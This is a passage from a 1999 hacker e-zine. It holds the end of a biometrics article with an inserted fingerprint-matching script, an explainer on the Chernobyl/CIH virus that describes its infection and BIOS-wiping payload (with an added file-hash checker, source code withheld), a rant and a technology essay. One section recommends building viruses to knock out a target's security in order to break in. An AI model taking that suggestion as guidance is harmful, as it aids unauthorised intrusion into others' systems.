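    r = math.radians(degrees)
    c, s = math.cos(r), math.sin(r)
    return Minutia(m.x * c - m.y * s, m.x * s + m.y * c,
                   (m.angle + degrees) % 360.0, m.kind)


def angle_diff(a, b):
    """Smallest difference between two ridge directions, in degrees."""
    d = abs(a - b) % 360.0
    return min(d, 360.0 - d)


def count_matches(template, probe, dist_tol=8.0, angle_tol=15.0):
    """Greedy one-to-one pairing: each template minutia takes the nearest
    unused probe minutia of the same kind within both tolerances."""
    used, matched = set(), 0
    for t in template:
        best, best_d = None, dist_tol
        for i, p in enumerate(probe):
            if i in used or p.kind != t.kind:
                continue
            d = math.hypot(t.x - p.x, t.y - p.y)
            if d <= best_d and angle_diff(t.angle, p.angle) <= angle_tol:
                best, best_d = i, d
        if best is not None:
            used.add(best)
            matched += 1
    return matched


def match_score(template, probe, rotations=(-10, -5, 0, 5, 10)):
    """Fraction of template minutiae matched, best over small rotations
    of the probe about the core (a slightly turned finger still matches)."""
    if not template:
        return 0.0
    best = max(count_matches(template, [rotate(p, r) for p in probe])
               for r in rotations)
    return best / len(template)


def verify(template, probe, threshold=0.6):
    """Access decision: the article's 'close enough' as a score threshold."""
    return match_score(template, probe) >= threshold


# Constructed enrollment template: eight minutiae relative to the core.
TEMPLATE = [
    Minutia(10, 0, 90, "end"),    Minutia(-12, 5, 45, "bif"),
    Minutia(3, 15, 180, "end"),   Minutia(-6, -14, 270, "end"),
    Minutia(18, 9, 30, "bif"),    Minutia(0, -20, 120, "bif"),
    Minutia(-20, -2, 200, "end"), Minutia(8, -8, 330, "end"),
]

# Same finger later: small position and angle noise, one minutia lost,
# one spurious minutia picked up from a smudge.
PROBE_SAME = [
    Minutia(11, 1, 94, "end"),    Minutia(-13, 4, 40, "bif"),
    Minutia(2, 16, 186, "end"),   Minutia(-5, -15, 265, "end"),
    Minutia(19, 10, 28, "bif"),   Minutia(1, -19, 125, "bif"),
    Minutia(-19, -1, 197, "end"), Minutia(25, 25, 0, "bif"),
]

# Faint or dirty reading of the same finger: only four minutiae found,
# so the genuine user is rejected (a false reject, not a security win).
PROBE_FAINT = PROBE_SAME[:4]

# A different finger.
PROBE_OTHER = [
    Minutia(5, 5, 0, "bif"),      Minutia(-15, -10, 90, "end"),
    Minutia(14, -3, 200, "end"),  Minutia(-2, 18, 300, "bif"),
    Minutia(20, 20, 60, "end"),   Minutia(-8, 10, 150, "end"),
]
```

The threshold is the tuning knob: lowering it lets the faint reading through but also raises the chance that a different finger scores high enough.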
================

Almost all of the methods of biometrics can be dumbfounded. Biometrics is not very secure in my opinion, and just ask Biosone. He thinks biometric security sucks. And, well, it does. In my opinion anyways. Do I know my shit, or what??? :-)

Thanx to Fraggle, RELM, Biosone especially... and magickal1^
All you guys rule... thanx.

--InfinityMatrix
http://imasylum.cjb.net
matrix@pobox.alaska.net

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 8 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Chernobyl Virus:
RELM

------------------------------------------------------------------------
The Virus:

There are many types of CIH viruses out there in the wild but there's only one that leads the pack: the Chernobyl CIH virus. The Chernobyl virus is probably one of the most destructive CIH viruses yet and can be a bugger to get rid of. There are a few different variants of this virus: two of them trigger on the 26th of April, one on the 26th of June and one triggers on the 26th of every month. I will be talking about the one that triggers on the 26th of every month. All you people who stick to *nix are safe from this nasty little virus and so are you Win NT peeps, but all the rest of you Win 95\98 people are naked to this virus, so I suggest you put some damn clothes on. In this text I hope to go over the characteristics of the Chernobyl CIH virus and explain some important issues that may concern your personal security against such viruses.

------------------------------------------------------------------------
The Life:

Well, say you have this little virii Chernobyl on your puter. First you would run the infected executable (Doh!), and this makes the virus memory resident. Since the virus is now memory resident, every file that you open or copy will be infected with the virus also... ewwww.
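Because the resident virus described above infects every file that is opened or copied, and (as the next section explains) packs itself into free space so the file's size does not change, a defender's baseline has to compare content hashes rather than sizes or timestamps. Added example, not the author's code; the directory tree it checks is constructed in a temporary folder.

```python
"""Content-hash baseline for executables, to spot modification in place.

A baseline that records only size or timestamp misses a file that was
rewritten without growing; this one stores a SHA-256 digest as well.
Added example with a constructed directory tree, not the article's code.
"""
import hashlib
import tempfile
from pathlib import Path

EXECUTABLE_PATTERNS = ("*.exe", "*.com", "*.dll")


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> {'size', 'sha256'} for every executable."""
    root = Path(root)
    baseline = {}
    for pattern in EXECUTABLE_PATTERNS:
        for p in root.rglob(pattern):
            rel = p.relative_to(root).as_posix()
            baseline[rel] = {"size": p.stat().st_size,
                             "sha256": file_digest(p)}
    return baseline


def check_baseline(root, baseline):
    """Return {relative path: finding} for every file that no longer
    matches.  'content' means same length but different bytes."""
    root = Path(root)
    findings = {}
    for rel, rec in baseline.items():
        p = root / rel
        if not p.is_file():
            findings[rel] = "missing"
        elif p.stat().st_size != rec["size"]:
            findings[rel] = "size"
        elif file_digest(p) != rec["sha256"]:
            findings[rel] = "content"
    # Executables that appeared after the baseline are worth a look too.
    for rel in build_baseline(root):
        if rel not in baseline:
            findings[rel] = "new"
    return findings


def demo():
    """Baseline a constructed tree, then overwrite 512 bytes inside one
    executable without changing its length, the way the article says
    the virus does.  Returns (baseline, findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app.exe").write_bytes(b"MZ" + b"\x00" * 4094)  # padded file
        (root / "util.exe").write_bytes(b"MZ" + b"\x01" * 2046)
        (root / "readme.txt").write_bytes(b"not an executable")
        baseline = build_baseline(root)
        with open(root / "app.exe", "r+b") as f:
            f.seek(1024)
            f.write(b"\xcc" * 512)        # same size, different content
        return baseline, check_baseline(root, baseline)


if __name__ == "__main__":
    _, findings = demo()
    for rel, why in findings.items():
        print(f"{rel}: {why}")
```

A size-only comparison would report nothing here; only the digest comparison flags app.exe.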
------------------------------------------------------------------------
Hide And Seek:

When the virus is going to infect a file it will scan the file for free space. It then breaks its own code into chunks and inserts itself into the free space in the file. Doing this means the infected file doesn't change size after the infection. Wow... now you have a whole bunch of files infected with this little bastard but you don't know it, because everything's just like it should be, so you go on about your business and it kicks your ass later.

------------------------------------------------------------------------
Virus Has An Attitude:

Now that you have this sweet little cute babe virus on your puter it's just going to sit there and look cute. Well, just like real kids they grow up and turn into assholes, so let me explain this virus's trigger actions. On the 26th of the month the payload activates: the virus writes over 1MB of the system's hard drive with random data. Now, to really screw you over, it will also attempt to modify or corrupt certain types of Flash BIOS (the virus will only do this if you have a Flash BIOS; a Flash BIOS means that you can write data to the BIOS, a function that was made to make it easier to upgrade the BIOS). If you don't know what this means, it means that it might destroy the BIOS of your computer; the BIOS loads your OS and manages the data transfers between your system devices such as your hard drive, mouse, keyboard, serial ports and your parallel ports. After the virus corrupts your BIOS your computer becomes inaccessible; to fix this you might have to replace the BIOS or deal with it in some other manner.

------------------------------------------------------------------------
Protecting Yourself:

This is a cruel world and there are mean people out there who get off on destroying people's property that they have paid for by working their ass off. (Note: I don't agree with any side, the Anarchists or the White Hat people. From learning and experience I have learned that it's better not to take sides but to just get along with both; doing this lets me have an even wider range of possible knowledge that I can learn and explore.)

To protect yourself against such people who wish to destroy your property for no reason I suggest you first learn the basics of working with the internet. For one, you should never accept files from someone you don't know. Second, never open an executable that was unzipped without scanning the file for viruses first; doing this is just plain stupid and you're most likely to get a virus. (Use a McAfee scanner or Norton Anti-Virus.) When you do download zipped files, scan them with good anti-virus software; don't use cheap programs, only use McAfee or Norton Anti-Virus. Third, make sure you always have the latest virus definitions for your anti-virus software. Fourth, keep up on the latest security issues and learn how to protect yourself from them. Always know about the latest viruses, because before you know it you might get one and you could have been prepared. Like they say... To Kill Your Enemy You Must Know Your Enemy. One final suggestion is that you scan your computer for viruses daily; if not daily, at least do it weekly. I scan my computer for viruses sometimes twice or even three times a day; this is because I do a lot of downloading and I have to make sure I don't get infected. Oh ya, it's a good idea if you do a lot of downloading of programs, software etc. that you do virus checks more often; doing this might lower your chances of getting loss of data or even hardware damage.

------------------------------------------------------------------------
Benefits Of Viruses:

Although viruses are naturally cruel and usually don't have good intentions, there are some that have a good cause or are helpful in breaking into a system (a good cause for your end, not necessarily the victim's).
There are a few viruses out there that open all available ports on a machine at a requested time. This might be helpful to you depending on what you are doing; or say you wish to break into a system but they have some type of security, well, you could make a virus to be able to take down that security, enabling you to have a chance to get into the system. Though most "Hackers" do not use viruses to help them get into a system, it is an alternative that you might need one day.

I have some words of wisdom that I tell to almost every newbie I see, and this is to stay away from trojans such as BO (Back Orifice), NetBus and all the other destructive and unethical trojans. If you wish to be a hacker your tools must come from your mind. Using trojans is not hacking, and it doesn't take a brain to get into a system that's patched; the real adventure is getting into systems using your brain and not some toy. Of course you will need tools to hack, but that comes later; first you must have the right state of mind, a clear understanding of the hacker community and the way it works. Hmm... I've kind of wandered off into newbie talk land here, sorry about that. It just bugs me to see all these people every day come into IRC and say "Can Some One Teach Me To Use Netbus?" and I'm sure there's many of you out there who feel the same way. Well, enuff with this ;)

------------------------------------------------------------------------
The Chernobyl Virus Source Code:

; This was going to be the spot for the Chernobyl source code.
; I decided not to include the source code because this
; virus is such a destructive one and there are so many people
; who would use it for more than learning purposes. In most of my
; virus texts I include the source code but for this one I made
; an exception. You can always read my many other virus texts
; such as the Alar Virus, Melissa Virus etc. and they all
; include the full source code for the virus. As I say in
; all my texts that include the source code, I ask that you only
; use it for learning purposes. I'm not just saying this as a
; disclaimer, I'm really serious about this and it should not be
; used for anything else. Thanks.

This concludes The Chernobyl Virus text Written By RELM.

Shout Outs To: All Of The Fallen Angel Members... You Rule! And All The Peepz At #hackerzlair.

-peace

[fallenangelz.cjb.net]

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 9 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Dr. Klep Speaks:
Written by Kleptic

Welcome to another installment of "Dr. Klep Speaks". In this issue, and in most of the other issues, we will be talking about whatever I'm pissed off about. I'll be ranting about school shootings, and why schools are now banning backpacks, cargo pants, and even baggy pants at certain schools. I will also be talking about the art of choosing a good computer handle. And I'll probably be ranting about what people think is lame, and what others think isn't lame. Enjoy!

===================
Contents
===================

1. School Shootings
2. Banning Backpacks, Cargo Pants, and Baggy Pants
3. How Do You Get A Good Computer Handle!?
4. Lame Or Not Lame!? That Is The Question!

====================
School Shootings
====================

Well, all these bomb threats and school shootings... They're horrible. Why would some sicko(s) come into a school of innocent kids and blast them with a high-powered rifle? This is a short section in this installment. But I'm sure all of us here at DoJ are all sorry for what happened at Columbine High School... and any other school shootings that happened around the world.

=====================
Banning Clothing?
=====================

Well, because of all the school shootings, some schools are now planning on banning backpacks, cargo pants, and even baggy pants. Now personally I think that's gay. I don't know anyone that would want to carry around a ton of heavy books all day, when it's a ton easier to just pop them in a backpack and carry them on your back. And cargo pants!? That's pretty dumb too. I mean, I can understand how people can hide weapons and stuff inside their cargo pockets, but still... a lot of people wear cargo pants, and some people would even have to buy a whole new wardrobe just for the dumb school dress code! And baggy pants!? Who is going to determine what is baggy and what isn't? Some kids wear like 30" legged pants, and they think that 12" is tight... and vice versa. I don't think that they can even ban clothing like that. People will always disobey the rules and wear their pants sagged, or really big... and people will always try to express themselves in different ways... The only way they can really do this is making all public schools wear uniforms, and I don't think they will even do that. All in all... it's pretty dumb.

===========================
The Art of making a handle
===========================

Hackers, phreaks, crackers, warez d00dz, and even phishers need a handle... but some kids new to the underground don't have any taste, and they pick a lame-ass name. First of all your handle should go with your personality. Like me, my handle is KLEPTIC, Kleptic meaning: a person who has an urge to steal things without even knowing it... and I used to steal info on the net all the time... The new age of so-called "hackers" have no taste in choosing a good computer handle. They pick nicks with a ton of "elite hax0r writing"... word of advice for those of you picking a new handle: be creative... don't use pre-existing hacker names, don't use those gay-ass names from the movie Hackers... remember your name gives you personality!

============================
Lame? Or Not Lame!?
============================

What is lame!? No one really knows anymore. It used to be something so easy it's not even fun. If it's fun, and everyone is using it... it's not lame now, is it!? Now if a so-called "lamer" is using this program, and abusing it... you think it's lame... that's today's definition of lameness. Today lame is something that is sooo popular and trendy and all the lamer kids are using; that's what lame is today. Personally I think that if it works, use it... and naturally people are going to choose the easy way over the hard way. But me on the other hand, I enjoy a challenge, and I like to think... What do you think is lame!? Send me an e-mail and tell me: kleptic@grex.org

=============================
The End Of The Story
=============================

Well, that's it... I hope you enjoyed my little ranting... if you have any ideas for the next installment please e-mail me some info: kleptic@grex.org

Thanx
-= KLEPTIC =-
kleptic@grex.org

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 10:::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Conclusion:

For a change we decided to include something different. Thanks EarthShaman.

Technology Revolution

The other type of revolution is that of New Technology. Nowadays there has been a big boom in technology. Calculators have moved up from the bulky abacus to the cheap and affordable tool used by almost everyone on a daily basis. There are satellites that provide entertainment and aid in forecasting weather. Communication via satellites is a relatively new thing, but many people are harnessing its power. Powers such as cellular phones, video phones, wireless computer communication, and Global Positioning Systems have all become available via satellites. Another power of satellites is that of Military and Government. Anyone remember the 'star wars' project?
Where satellites with munitions could take out missiles launched at the United States. Who's there to say there aren't already spy satellites out there that can follow you everywhere and peer into your 'secret' lives? (The movie Real Genius comes to mind.)

And all this eventually boils down to computers. Computers have evolved tremendously in 40 years, from the big warehouse computers that ran off punch card programs. This is where the well-known term "bug" came from, where actual bugs crawled across or ate the vacuum tubes and caused shorts. Jumping ahead a few years to the somewhat affordable computers such as Tandy's TRS-80 Model 100, the first cheap 'laptop' computer. And now, near the end of the century, there is a surplus of computers for any and every profession. Laptops, palm computers and desktop computers have overrun today's society, with worldwide companies competing for the "best" computer.

But as always, for every up there is a down. Computer viruses have been in production since the origin of the computer. These small, yet complex, lines of code, created by crackers, have made it to the headlines of media all around the world. Recently unleashed was the "harmless" Melissa macro virii, and of course the CIH virus, designed to rewrite BIOS chips and "meltdown" computers worldwide. (It ended up getting some 600,000 computers worldwide.) Remember the good ole days when hackers (yes, hackers; crackers are the malicious group of people) created such viruses as the "Yankee Doodle Virus", that played a melody on one's internal computer speaker on July 4th? In recent years, the media has latched onto the "Cracker Crimes" and defaced the hacking community, by labeling everyone that does malicious things a "hacker". The sad thing is that everyone believes the media. An example of this is while I am sittin' in #Hackerzlair or #Hackerhelp (dalnet), and people saunter in and ask us how to hack into someone's computer and delete things on it.

I'm sure hackers have broken into computers before, just to prove they can (comin' from personal experience), then some of us send the Admin the hole in his system, and go along our merry ways. After all, "gaining access" into computer systems is an activity of immense thinking and planning. Alas, a favorite pastime activity. Just recently the Clinton Administration has passed many laws regarding computer crime and even set up agencies to take down these people that commit crimes via computer, often charging these people with nonsense crimes and holding them in prison for inappropriate sentences. Such as the case of BernieS, who was thrown in jail, beaten and served an extremely long sentence for simply possessing a Rat Shack tone dialer with a modified crystal in it. Some even say it never had any batteries in it. And the famous Kevin Mitnick, who has done the crime of stealing cellular information, but has been in jail for years with no trial, and given the same treatment as a rapist or murderer.

In conclusion, technology has changed dramatically since the advent of the "chip", for better and for worse. You never know, maybe AI (Artificial Intelligence) shall rule the world in 2020; tables will turn and we shall all be slaves to the computers.

Watch your back,
~EarthShaman

A little 'bout the Author (like anyone gives a shit): ES has been working with computers since the dawn of TRS-80's, and has been online (started out BBS'in) since the late 80's. He is currently a Y2K Researcher/Consultant in central California. Known to frequent dalnet's #Hackerzlair and #hacker_help. Drop in and drop me a line if ya read this.